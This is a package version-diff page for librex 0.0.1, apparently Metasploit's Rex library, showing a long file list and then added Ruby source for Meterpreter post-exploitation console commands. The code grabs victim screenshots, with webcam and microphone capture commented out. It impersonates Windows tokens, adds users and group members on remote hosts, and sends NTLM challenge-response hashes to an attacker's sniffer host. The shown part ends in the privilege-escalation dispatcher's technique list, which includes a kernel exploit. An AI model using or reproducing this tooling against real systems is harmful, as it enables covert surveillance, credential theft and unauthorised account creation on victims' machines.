RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb ADDED

@@ -0,0 +1,108 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Espia - Capture audio, video, screenshots from the remote system
+#
+###
+class Console::CommandDispatcher::Espia
+	Klass = Console::CommandDispatcher::Espia
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the espia command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+	#		"dev_image"  => "Attempt to grab a frame from webcam",
+	#		"dev_audio"  => "Attempt to record microphone audio",
+			"screengrab" => "Attempt to grab screen shot from process's active desktop"
+		}
+	end
+	def cmd_dev_image()
+		client.espia.espia_video_get_dev_image()
+		print_line("[*] Done.")
+		return true
+	end
+	def cmd_dev_audio(*args)
+		maxrec = 60
+		if (args.length < 1)
+			print_line("Usage: dev_audio <rec_secs>\n")
+			print_line("Record mic audio\n")
+			return true
+		end
+		secs = args[0].to_i
+		if secs  > 0 and secs <= maxrec
+			milsecs = secs*1000
+			print_line("[*] Recording #{milsecs} miliseconds.\n")
+			client.espia.espia_audio_get_dev_audio(milsecs)
+			print_line("[*] Done.")
+		else
+			print_line("[-] Error: Recording time 0 to 60 secs \n")
+		end
+		return true
+	end
+	#
+	# Grab a screenshot of the current interactive desktop.
+	#
+	def cmd_screengrab( *args )
+		if( args[0] and args[0] == "-h" )
+			print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
+			print_line("Grab a screenshot of the current interactive desktop.\n")
+			return true
+		end
+		show = true
+		show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
+		path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
+		data = client.espia.espia_image_get_dev_screen
+		if( data )
+			::File.open( path, 'wb' ) do |fd|
+				fd.write( data )
+			end
+			path = ::File.expand_path( path )
+			print_line( "Screenshot saved to: #{path}" )
+			Rex::Compat.open_file( path ) if show
+		end
+		return true
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Espia"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb ADDED

@@ -0,0 +1,241 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Incognito
+	Klass = Console::CommandDispatcher::Incognito
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"add_user" => "Attempt to add a user with all tokens",
+			"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
+			"add_group_user" => "Attempt to add a user to a global group with all tokens",
+			"list_tokens" => "List tokens available under current user context",
+			"impersonate_token" => "Impersonate specified token",
+			"snarf_hashes" => "Snarf challenge/response hashes for every token"
+		}
+	end
+	@@add_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to remote host" ])
+	@@add_localgroup_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to local group on remote host" ])
+	@@add_group_user_opts = Rex::Parser::Arguments.new(
+		"-h" => [ true,  "Add user to global group on remote host" ])
+	@@list_tokens_opts = Rex::Parser::Arguments.new(
+		"-u" => [ false,  "List tokens by unique username" ],
+		"-g" => [ false, "List tokens by unique groupname" ])
+	def cmd_list_tokens(*args)
+		token_order = -1
+		@@list_tokens_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-u"
+					token_order = 0
+				when "-g"
+					token_order = 1
+			end
+		}
+		if (token_order == -1)
+			print_line("Usage: list_tokens <list_order_option>\n")
+			print_line("Lists all accessible tokens and their privilege level")
+			print_line(@@list_tokens_opts.usage)
+			return
+		end
+		system_privilege_check
+		tokens = client.incognito.incognito_list_tokens(token_order)
+		print_line()
+		print_line("Delegation Tokens Available")
+		print_line("========================================")
+		tokens['delegation'].each_line { |string|
+			print(string)
+		}
+		print_line()
+		print_line("Impersonation Tokens Available")
+		print_line("========================================")
+		tokens['impersonation'].each_line { |string|
+			print(string)
+		}
+		print_line()
+		return true
+	end
+	def cmd_impersonate_token(*args)
+		if (args.length < 1)
+			print_line("Usage: impersonate_token <token>\n")
+			print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
+			print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
+			print_line("Hint: Enclose with quotation marks if name contains a space\n")
+			return
+		end
+		system_privilege_check
+		username = args[0]
+		client.incognito.incognito_impersonate_token(username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_user <username> <password> [options]\n")
+			print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
+			print_line(@@add_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		username = args[0]
+		password = args[1]
+		client.incognito.incognito_add_user(host, username, password).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_localgroup_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_localgroup_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		groupname = args[0]
+		username = args[1]
+		client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_add_group_user(*args)
+		# Default to localhost
+		host = "127.0.0.1"
+		@@add_group_user_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					host = val
+			end
+		}
+		if (args.length < 2)
+			print_line("Usage: add_group_user <groupname> <username> [options]\n")
+			print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
+			print_line(@@add_group_user_opts.usage)
+			return
+		end
+		system_privilege_check
+		groupname = args[0]
+		username = args[1]
+		client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
+			print(string)
+		}
+		return true
+	end
+	def cmd_snarf_hashes(*args)
+		if (args.length < 1)
+			print_line("Usage: snarf_hashes <sniffer_host>\n")
+			print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
+			return
+		end
+		system_privilege_check
+		print_line("[*] Snarfing token hashes...")
+		client.incognito.incognito_snarf_hashes(args[0])
+		print_line("[*] Done. Check sniffer logs")
+		return true
+	end
+	def system_privilege_check
+		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+			print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
+			print_line("             Call rev2self if primary process token is SYSTEM")
+		end
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Incognito"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb ADDED

@@ -0,0 +1,61 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# Privilege escalation extension user interface.
+#
+###
+class Console::CommandDispatcher::Priv
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd'
+	require 'rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp'
+	Klass = Console::CommandDispatcher::Priv
+	Dispatchers =
+		[
+			Klass::Elevate,
+			Klass::Passwd,
+			Klass::Timestomp,
+		]
+	include Console::CommandDispatcher
+	#
+	# Initializes an instance of the priv command interaction.
+	#
+	def initialize(shell)
+		super
+		Dispatchers.each { |d|
+			shell.enstack_dispatcher(d)
+		}
+	end
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+		}
+	end
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"Privilege Escalation"
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb ADDED

@@ -0,0 +1,98 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# The local privilege escalation portion of the extension.
+#
+###
+class Console::CommandDispatcher::Priv::Elevate
+	Klass = Console::CommandDispatcher::Priv::Elevate
+	include Console::CommandDispatcher
+	ELEVATE_TECHNIQUE_NONE					= -1
+	ELEVATE_TECHNIQUE_ANY					= 0
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
+	ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
+	ELEVATE_TECHNIQUE_VULN_KITRAP0D			= 4
+	ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available",
